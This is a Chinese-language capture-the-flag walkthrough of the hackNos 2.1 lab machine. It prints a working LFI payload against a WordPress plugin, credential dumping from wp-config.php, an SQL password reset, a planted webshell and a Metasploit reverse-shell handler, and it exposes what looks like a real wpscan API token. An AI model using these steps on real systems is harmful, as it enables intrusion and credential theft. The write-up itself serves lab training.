靶机信息
- hackNos: Os-hackNos-2.1
- Name: hackNos: Os-hackNos-2.1
- Date release: 29 Nov 2019
- Author: Rahul Gehlaut
- Difficulty : Easy to Intermediate
- Flag : 2 Flag first user And second root
- Learning : Web Application | Enumeration | Password Cracking
- Download
- Download (Mirror)
- Download (Torrent) (Magnet)
信息收集
靶机设置的Host-Only网络模式,通过本机网卡信息确定虚拟机网断,然后使用Nmap扫描,来确定靶机IP。
➜ sudo nmap -sS -O 192.168.56.0/24
Nmap scan report for 192.168.56.104
Host is up (0.0072s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:BB:35:44 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop确定主机IP后,然后扫描端口与服务。
➜ sudo nmap -sS -O 192.168.56.0/24
Nmap scan report for 192.168.56.104
Host is up (0.0072s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:BB:35:44 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop只开放了80和22,那么切入点应该在web服务上。访问网站,index页面是apache配置好的默认页面。
用dirsearch扫描一下目录,发现存在/tsweb目录,访问发现是个Wordpress站点。
首页查看源代码,发现版本号:WordPress 5.3,版本较新,没什么可利用的漏洞。
Wordpress当然要上wpscan啦,果然发现了问题。
➜ wpscan --url http://192.168.56.104/tsweb/ --enumerate u
[i] Plugin(s) Identified:
[+] gracemedia-media-player
| Location: http://192.168.56.104/tsweb/wp-content/plugins/gracemedia-media-player/
| Latest Version: 1.0 (up to date)
| Last Updated: 2013-07-21T15:09:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| [!] 1 vulnerability identified:
|
| [!] Title: GraceMedia Media Player 1.0 - Local File Inclusion (LFI)
| References:
| - https://wpvulndb.com/vulnerabilities/9234
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
| - https://www.exploit-db.com/exploits/46537/
| - https://seclists.org/fulldisclosure/2019/Mar/26
|
| Version: 1.0 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.104/tsweb/wp-content/plugins/gracemedia-media-player/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.104/tsweb/wp-content/plugins/gracemedia-media-player/readme.txt
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <====================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] user
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://192.168.56.104/tsweb/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
发现了存在问题的插件和一个用户名。
这里在使用wpscan时遇到了update失败的问题,在文章最后会有问题记录。
漏洞利用
该插件存在文件读取漏洞
Exp:
http://192.168.56.104/tsweb/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd读到了一些有用信息:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
......
......
rohit:x:1000:1000:hackNos:/home/rohit:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash用户:root,rohit,flag,且flag的密码hash也得到了,解密后为topsecret,以flag用户成功ssh登陆。
- Tips
/etc/passwd:
普通用户权限能够查看保存用户信息,每一行代表一个用户,每一行通过冒号:分为七个部分
用户名
密码,x表示密码保存在/etc/shadow
UID,0代表root
GID,表示所在组
描述信息,依次为Full Name、Room Number、Work Phone、Home Phone和Other
用户主目录
默认shell类型/etc/shadow:
只有root用户权限能够查看保存加密后的密码和用户的相关密码信息,每一行代表一个用户,每一行通过冒号:分为九个部分
加密的密码具有固定格式:
$id$salt$encrypted
id表示加密算法,1代表MD5,5代表SHA-256,6代表SHA-512 salt表示密码学中的Salt,系统随机生成 encrypted表示密码的hash
根据用户描述,在home/rohit/user.txt发现第一枚flag
MD5-HASH : bae11ce4f67af91fa58576c1da2aad4b 提权
信息收集
flag@hacknos:/$ id
uid=1001(flag) gid=1003(flag) groups=1003(flag)
flag@hacknos:/$ uname -a
Linux hacknos 4.15.0-70-generic #79-Ubuntu SMP Tue Nov 12 10:36:11 UTC 2019 x86_64 x86_64 x86_64 GNU/Linuxflag用户权限非常低,所以需要想办法搞个高点权限的账户,比如www-data,那就想办法写个webshell。
查看Wordpress的配置文件:wp-config.php,查找数据库相关配置。
flag@hacknos:/$ cat /var/www/html/tsweb/wp-config.php|grep DB
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wpuser' );
define( 'DB_PASSWORD', 'hackNos-2.com' );
define( 'DB_HOST', 'localhost' );
define( 'DB_CHARSET', 'utf8mb4' );
define( 'DB_COLLATE', '' );哦吼,发现了用户名和密码,成功登陆mysql。
查询wordpress的用户名和密码
mysql> select user_login,user_pass from wp_users;
+------------+------------------------------------+
| user_login | user_pass |
+------------+------------------------------------+
| user | $P$B.O0cLMNmn7EoX.JMHPnNIPuBYw6S2/ |
+------------+------------------------------------+
1 row in set (0.00 sec)没办法解密,直接修改密码。
mysql> UPDATE wp_users SET user_pass = MD5('lanvnal') WHERE user_login ='user';
Query OK, 1 row affected (0.05 sec)
Rows matched: 1 Changed: 1 Warnings: 0登陆后台,修改模板的404.php代码为webshell。通过蚁剑连接。
/tmp是可写目录,直接msf一把梭,获得meterpreter shell。
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf5 exploit(multi/handler) > exploit上LinEnum搜集信息。
;31m[-] It looks like we have some admin users:m
uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm)
uid=1000(rohit) gid=1000(rohit) groups=1000(rohit),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
看了看没有suid提权可利用的程序,看来想办法搞定rohit用户就可以了。
翻靶机文件看看有没有备份之类的会藏有用户密码,在/var/backups/passbkp/目录下发现md5-hash文件。
$1$rohit$01Dl0NQKtgfeL08fGrggi0解密结果为:!%hack41切换用户,直接sudo
提权
flag@hacknos:/$ su rohit
Password:
rohit@hacknos:/$ sudo su
[sudo] password for rohit:
root@hacknos:/# ls /root
root.txt
root@hacknos:/# cat /root/root.txt
_______ __ __ __ #
/ \ / | / |/ | #
$$$$$$$ | ______ ______ _$$ |_ _$$ |$$ |_ #
$$ |__$$ | / \ / \ / $$ | / $$ $$ | #
$$ $$< /$$$$$$ |/$$$$$$ |$$$$$$/ $$$$$$$$$$/ #
$$$$$$$ |$$ | $$ |$$ | $$ | $$ | __ / $$ $$ | #
$$ | $$ |$$ \__$$ |$$ \__$$ | $$ |/ | $$$$$$$$$$/ #
$$ | $$ |$$ $$/ $$ $$/ $$ $$/ $$ |$$ | #
$$/ $$/ $$$$$$/ $$$$$$/ $$$$/ $$/ $$/ #
#############################################################
#############################################################
MD5-HASH : bae11ce4f67af91fa58576c1da2aad4b
Blog : www.hackNos.com
Author : Rahul Gehlaut
linkedin : https://www.linkedin.com/in/rahulgehlaut/
#############################################################遇到的问题和解决方法
wpscan不能update的问题
Mac下使用HomeBrew安装最新的wpscan,在wpscan更新数据库时发生错误。
➜ ./wpscan --update
cli_options:
api_token: pTBhWI3kRUbP8KV3vD6nCtpDussLs9dwYX7bvCSahwQ
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
cli_options:
Version 2.9.4
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[i] Updating the Database ...
[!] Unable to get https://data.wpscan.org/local_vulnerable_files.xml.sha512 (status: 403)curl结果:
➜ curl https://data.wpscan.org/local_vulnerable_files.xml.sha512
error code: 1020%去GitHub项目看一下最新版本发现版本相差有点大。
应该是版本太老的原因,最新版本已经是3.7.7了,但是brew的没有及时更新。去GitHub的wpscan项目clone最新源码,自行编译就好。
➜ git clone https://github.com/wpscanteam/wpscan
➜ cd wpscan
➜ bundle install && rake installwpscan使用上的问题
现在使用wpscan需要使用官方的api-token,这个可以自己注册一个免费的账号,每日50使用次数。
为了方便使用,可以将api-token保存在文件中,在~/.wpscan/scan.yml文件中添加如下内容:
cli_options:
api_token: YOUR_API_TOKEN
